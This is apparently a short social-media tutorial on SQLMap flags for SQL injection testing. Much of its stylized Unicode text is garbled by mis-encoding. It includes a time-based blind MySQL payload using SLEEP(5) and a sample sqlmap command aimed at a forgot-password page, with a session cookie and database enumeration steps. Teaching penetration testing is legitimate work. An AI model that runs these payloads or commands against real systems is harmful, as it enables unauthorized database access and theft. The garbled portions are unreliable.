A tool is only as effective as its operator. Properly utilizing flags can significantly enhance the efficiency, confidence, and success rate of injection testing.
๐๐ฒ๐ ๐ฅ๐ฒ๐ฐ๐ผ๐บ๐บ๐ฒ๐ป๐ฑ๐ฎ๐๐ถ๐ผ๐ป๐
โข --๐ฉ๐ฆ๐ญ๐ฑ or --๐ฉ๐ฆ๐ญ๐ฑ | ๐จ๐ณ๐ฆ๐ฑ <๐ฑ๐ข๐ณ๐ข๐ฎ๐ฆ๐ต๐ฆ๐ณ> to access and filter the flag documentation, which provides an overview of all options.
โข -๐ to include necessary headers, such as session cookies. Limit headers to those necessary for the process.
โข --๐ธ๐ช๐ป๐ข๐ณ๐ฅ flag is useful for beginners, as it provides step-by-step prompts for configuring each command.
โข --๐ฅ๐ถ๐ฎ๐ฑ or --๐ฅ๐ถ๐ฎ๐ฑ-๐ข๐ญ๐ญ should be selective; dumping the entire database is often unnecessary.
โข Select only the flags that are essential for the task, and avoid redundant or unnecessary ones.
๐๐๐ถ๐น๐ฑ๐ถ๐ป๐ด ๐ผ๐ป ๐๐ผ๐ด๐ ๐ณ๐ผ๐ฟ ๐๐ฐ๐ฐ๐๐ฟ๐ฎ๐ฐ๐
Use previous scans logs data to increase the accuracy of subsequent attempts.
Example:
๐๐ข๐ณ๐ข๐ฎ๐ฆ๐ต๐ฆ๐ณ: ๐ถ๐ด๐ฆ๐ณ๐ฏ๐ข๐ฎ๐ฆ (๐๐๐๐)
๐๐บ๐ฑ๐ฆ: ๐ต๐ช๐ฎ๐ฆ-๐ฃ๐ข๐ด๐ฆ๐ฅ ๐ฃ๐ญ๐ช๐ฏ๐ฅ
๐๐ช๐ต๐ญ๐ฆ: ๐๐บ๐๐๐ >= 5.0.12 ๐๐๐ ๐ต๐ช๐ฎ๐ฆ-๐ฃ๐ข๐ด๐ฆ๐ฅ ๐ฃ๐ญ๐ช๐ฏ๐ฅ (๐ฒ๐ถ๐ฆ๐ณ๐บ ๐๐๐๐๐)
๐๐ข๐บ๐ญ๐ฐ๐ข๐ฅ: ๐ถ๐ด๐ฆ๐ณ๐ฏ๐ข๐ฎ๐ฆ=๐ญ๐ญ๐ญโ ๐๐๐ (๐๐๐๐๐๐ 5284 ๐๐๐๐ (๐๐๐๐๐๐(๐๐๐๐๐(5)))๐๐ก๐ ๐ญ) ๐๐๐ โ๐๐ญ๐๐กโ='๐๐ญ๐๐ก
The following scan we should use:
โข --๐ต๐ฆ๐ค๐ฉ๐ฏ๐ช๐ฒ๐ถ๐ฆ to specify the type (e.g., time-based, blind, reflected).
โข -๐ฑ to designate specific parameters to test.
โข --๐ฅ๐ข๐ต๐ข or --๐ฅ๐ข๐ต๐ข-๐ณ๐ข๐ธ for raw data formats.
๐๐ผ๐ป๐๐๐ฟ๐๐ฐ๐๐ถ๐ป๐ด ๐ฎ ๐๐ฎ๐๐ฎ๐ฏ๐ฎ๐๐ฒ ๐๐ป๐๐บ๐ฒ๐ฟ๐ฎ๐๐ถ๐ผ๐ป ๐๐ผ๐บ๐บ๐ฎ๐ป๐ฑ
To enumerate the entire DB, follow these steps in sequence:
- โ๐ฅ๐ฃ๐ฎ๐ด to specify the DBMS type.
- -๐ to specify the DB name.
- โ๐ต๐ข๐ฃ๐ญ๐ฆ๐ด to retrieve tables within the specified database.
- Continue refining to include or exclude rows and columns as needed.
๐ฆ๐ฎ๐บ๐ฝ๐น๐ฒ ๐๐ผ๐บ๐บ๐ฎ๐ป๐ฑ
Below is an example of a command incorporating these elements:
๐ด๐ฒ๐ญ๐ฎ๐ข๐ฑ -๐ถ โ๐ฉ๐ต๐ต๐ฑ://๐ฎ๐ฐ๐ฏ๐ช๐ต๐ฐ๐ณ๐ด๐ต๐ฉ๐ณ๐ฆ๐ฆ.๐ฉ๐ต๐ฃ/๐ง๐ฐ๐ณ๐จ๐ฐ๐ต_๐ฑ๐ข๐ด๐ด๐ธ๐ฐ๐ณ๐ฅ.๐ฑ๐ฉ๐ฑโ
-๐ ๐๐๐๐
-๐ โ๐๐ฐ๐ฐ๐ฌ๐ช๐ฆ: ๐๐๐๐๐๐๐๐๐=24๐ฏ๐ฎ๐ฃ๐ค๐ณ๐ฎ49๐ฑ11๐ฒ2๐ข๐จ๐ฐ๐ข๐ณ๐ต๐ณ๐ฉ17๐ฅโ
โ๐ฅ๐ข๐ต๐ข โ๐ถ๐ด๐ฆ๐ณ๐ฏ๐ข๐ฎ๐ฆ=๐ฏ๐ข๐ฎ๐ฆโ
โ๐ฅ๐ฃ๐ฎ๐ด $$$
โ๐ต๐ฆ๐ค๐ฉ๐ฏ๐ช๐ฒ๐ถ๐ฆ $$$
๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ ฬฒ(ฬฒ$ฬฒ$ฬฒ$ฬฒ)ฬฒ ฬฒ๐ ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ ฬฒ๐ขฬฒ๐ฬฒ๐ฬฒ ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ ฬฒ๐ฬฒ๐ฬฒ ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ ฬฒ(ฬฒ๐ฬฒ.ฬฒ๐ฬฒ.ฬฒ,ฬฒ ฬฒ๐ผฬฒ๐ขฬฒ๐ฬฒ๐ฬฒ๐ปฬฒ,ฬฒ ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒโฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ)ฬฒ.ฬฒ
ฬฒ๐ฒฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ๐ฬฒ
By gradually defining your command, SQLMap can be tailored to deliver focused, accurate results with minimized server load. Each flag used should contribute to the clarity and efficiency of your injection testing process.
Further Reference: https://github.com/sqlmapproject/sqlmap/wiki